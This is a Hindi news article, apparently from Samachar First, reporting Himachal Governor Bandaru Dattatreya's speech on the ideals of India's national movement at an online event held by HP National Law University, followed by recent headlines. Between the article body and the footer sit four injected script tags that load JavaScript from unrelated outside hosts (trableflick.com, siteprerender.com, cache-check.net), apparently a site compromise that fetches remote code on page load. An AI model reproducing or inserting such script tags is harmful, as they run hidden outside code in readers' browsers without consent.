Categories: हिमाचल

राष्ट्रीय आंदोलन के आदर्शों का पालन करेंः राज्यपाल

<p>राज्यपाल बंडारू दत्तात्रेय की अध्यक्षता में आज यहां हिमाचल प्रदेश नेशनल लॉ यूनिवर्सिटी शिमला द्वारा &lsquo;&lsquo;स्वतंत्रता आंदोलन एवं राष्ट्रीय राजनीतिक विचार&rsquo;&rsquo; विषय पर ऑनलाइन विचार-विमर्श कार्यक्रम का आयोजन किया गया। इस मौके पर उन्होंने कहा कि भारत की स्वतंत्रता का विशेष ऐतिहासिक महत्व है क्योंकि इस इतिहास के फलस्वरूप हम राजनीतिक तौर पर आजाद हुए और हमने लोगों के दिल और दिमाग में राष्ट्रीयता का विचार पैदा करना शुरू किया। अगर ऐसा न होता तो लोग अपनी जाति, समुदाय और धर्म आदि के आधार पर ही सोचते रह जाते।हालांकि भारतीय होने का यह गौरव केवल एक भौगोलिक सीमा के ऊपर खड़ा था।</p>

<p>उन्होंने कहा कि भारत का असली और पूरा गौरव इसकी सीमाओं में नहीं बल्कि इसकी सांस्कृतिक, आध्यात्मिक मूल्यों और सार्वभौमिकता में है। यहां के निवासी हजारों सालों से बिना किसी बड़े संघर्ष के रहते आ रहे हैं। भारत में लंबे अरसे से स्थिर समाजों का उदय हुआ और नतीजतन आध्यात्मिक प्रक्रियाएं विकसित हुई। इंसान बुनियादी रूप से क्या है, इस मुद्दे पर इस धरती की किसी भी दूसरी संस्कृति ने उतनी गहराई से विचार नहीं किया जैसा हमारे देश में किया गया। भारत के नागरिकों को उन महान आदर्शों का ध्यान रखते हुए पालन करना चाहिए, जो हमारे राष्ट्रीय आन्दोलन की प्रेरणा का स्त्रोत बने।</p>

<p>राज्यपाल ने कहा कि ने कहा कि एक समाज का निर्माण और स्वतंत्रता, सम्मानता, अहिंसा, भाईचारा और विश्व-शांति के लिए एक संयुक्त राष्ट्र का निर्माण हमारे आदर्श हैं। यदि भारतीय नागरिक इन आदर्शों के प्रति सचेत और प्रतिबद्ध हो तो अलगाववादी प्रवृत्तियां कहीं भी जन्म नहीं ले सकती है। आज संविधान स्थापना के 70वें वर्ष में हर एक नागरिक को ये सारे संकल्प दोहराने होंगे। देश को एक साथ आकर यह विश्वास करना होगा कि हमारे वर्तमान और भविष्य, वास्तव में हमारे गौरवशाली अतीत में ही विराजमान है। इससे पूर्व हिमाचल प्रदेश राष्ट्रीय विधि विश्वविद्यालय की उप-कुलपति प्रो. निष्ठा जसवाल ने राज्यपाल का स्वागत किया। पंजाब विश्वविद्यालय के राजनीतिक विज्ञान विभाग के अध्यक्ष प्रो. आशुतोष कुमार और पूर्व प्राध्यापक देवी सरोही ने भी अपने विचार रखे। डॉ. वेद प्रकाश ने धन्यवाद प्रस्ताव प्रस्तुत किया।&nbsp;&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1599652101422″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

PCC Meeting: सीएम की उपस्थिति पर संशय, डिप्टी सीएम नहीं होंगे

Shimla:कांग्रेस अध्यक्ष प्रतिभा सिंह ने प्रदेश कांग्रेस कमेटी कुछ ही देर में कांग्रेस भवन में…

5 mins ago

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

35 mins ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

58 mins ago

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

15 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

15 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

16 hours ago